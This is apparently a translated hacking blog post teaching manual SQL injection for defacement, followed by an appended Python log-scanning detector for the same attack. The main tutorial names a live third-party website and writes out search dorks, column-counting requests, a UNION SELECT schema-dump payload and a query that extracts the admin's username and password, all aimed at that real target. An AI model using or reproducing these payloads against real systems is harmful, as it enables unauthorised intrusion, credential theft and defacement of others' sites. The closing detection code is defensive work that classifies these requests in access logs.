Assalamualaikum friends, welcome back to my blog. This time I'm sharing a tutorial on defacing with a manual SQL injection PoC. OK, straight to the tutorial.
~Dork:
department.asp?dept=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
product_detail.asp?catalogid=
product_detail.cfm?catalogid=
product_list.asp?catalogid=
product_list.cfm?catalogid=
ShowProduct.cfm?CatID=
ShowProduct.asp?CatID=
live target: http://iagcc.com/news.php?id=58
OK, first we check whether the site is vulnerable or not. To check, just append a ' character, or add %27, like I do here:
http://iagcc.com/news.php?id=58'
There, it's vulnerable: Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY id DESC' at line 1
OK, now we inject. The way to do it is to append ORDER BY clauses:
http://iagcc.com/news.php?id=58+order+by+1-- (Normal)
http://iagcc.com/news.php?id=58+order+by+2-- (Normal)
http://iagcc.com/news.php?id=58+order+by+3-- (Normal)
http://iagcc.com/news.php?id=58+order+by+4-- (Normal)
http://iagcc.com/news.php?id=58+order+by+5-- (Normal)
http://iagcc.com/news.php?id=58+order+by+6-- (Normal)
http://iagcc.com/news.php?id=58+order+by+7-- (Error)
Because the error appears at 7, there are 6 columns.
Now we add a UNION SELECT that matches the number of columns.
Example:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--
Don't forget to use the minus sign (-).
After that the magic number will appear. On this site the magic number is 4. Because the magic number is 4, that is where we will insert the DIOS.
Dios:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Don't get it? Go jerk off some more.
Here's an example:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--
There, the admin table with user and password shows up; see the screenshot.
So how do you view the admin's u/p? Like this:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,UserName,Password)),@),5,6--
And boom, you've got the admin's username and password, you know the rest.
OK, that's all for this tutorial from me. I'm tired of typing, phew.
Credit nick: MR SPONGEBOB
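Seen from the defending side, the request sequence in this post (quote test, ORDER BY counting, UNION SELECT, information_schema query) leaves a recognisable trail in the web server's access log. The following is an added example, not code from the original post: it classifies each logged query string by stage and groups the hits per client. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Most advanced stage first: a schema-dump request also contains UNION SELECT.
STAGES = [
    ("schema_dump", re.compile(r"information_schema", re.I)),
    ("union_select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("column_count_probe", re.compile(r"order\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"=[^&]*'")),  # noisy alone: also matches q=don't
]
# Combined-log-format prefix: client IP ... "METHOD target HTTP/x"
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(query):
    """Name the most advanced injection stage in a raw query string, or None."""
    decoded = unquote_plus(query)  # turns %27 into ' and + into a space
    for name, pattern in STAGES:
        if pattern.search(decoded):
            return name
    return None

def scan(lines):
    """Map client IP -> ordered list of (stage, path) for suspicious requests."""
    findings = {}
    for m in filter(None, map(REQUEST.match, lines)):  # skip unparsable lines
        ip, target = m.groups()
        path, _, query = target.partition("?")
        stage = classify(query)
        if stage:
            findings.setdefault(ip, []).append((stage, path))
    return findings

def escalated(findings):
    """IPs that moved past probing to UNION-based data extraction."""
    return sorted(ip for ip, hits in findings.items()
                  if any(s in ("union_select", "schema_dump") for s, _ in hits))

# Constructed log lines (documentation IP ranges), modelled on the requests above.
T = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {T} "GET /news.php?id=58 HTTP/1.1" 200 5120',
    f'203.0.113.9 - - {T} "GET /news.php?id=58%27 HTTP/1.1" 200 310',
    f'203.0.113.9 - - {T} "GET /news.php?id=58+order+by+6-- HTTP/1.1" 200 5120',
    f'203.0.113.9 - - {T} "GET /news.php?id=58+order+by+7-- HTTP/1.1" 200 298',
    f'203.0.113.9 - - {T} "GET /news.php?id=-58+union+select+1,2,3,4,5,6-- HTTP/1.1" 200 900',
    f'203.0.113.9 - - {T} "GET /news.php?id=-58+union+select+1,2,3,'
    f'(select(1)from(information_schema.columns)),5,6-- HTTP/1.1" 200 9000',
]
```

A single `quote_probe` hit is weak evidence; a client that appears in `escalated(scan(log))` has progressed to data extraction and warrants blocking and a review of what the application returned.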